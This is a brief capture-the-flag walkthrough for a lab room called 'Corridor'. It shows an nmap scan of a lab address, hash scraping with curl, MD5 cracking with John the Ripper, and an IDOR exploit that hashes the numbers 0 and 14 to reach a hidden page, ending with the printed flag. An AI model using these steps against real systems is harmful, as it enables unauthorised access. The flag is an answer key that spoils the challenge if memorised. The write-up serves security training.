Can you escape the Corridor?
scan the target
nmap -sS -sV 10.10.225.145
go to the webpage, we can see a corridor with a lot of door can open
when view source, i can see a lot of hash value on each door
now, i will colect all these hashes to further research
curl http://10.10.225.145 | grep 'alt' | cut -d '"' -f4 > hash.txt
crack the hash with john the ripper
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Clearly, all hashed URL endpoints are numbers from 1 to 13.
let's think about IDOR vulnerability, i will change the hashed URL to over the zone, maybe 14 or 0
echo -n 14 | md5sum
echo -n 0 | md5sum
nothing at room 14 but there is a flag at room 0
Here you are
| Flag | Corridor |
|---|---|
| Answer | flag{2477ef02448ad9156661ac40a6b8862e} |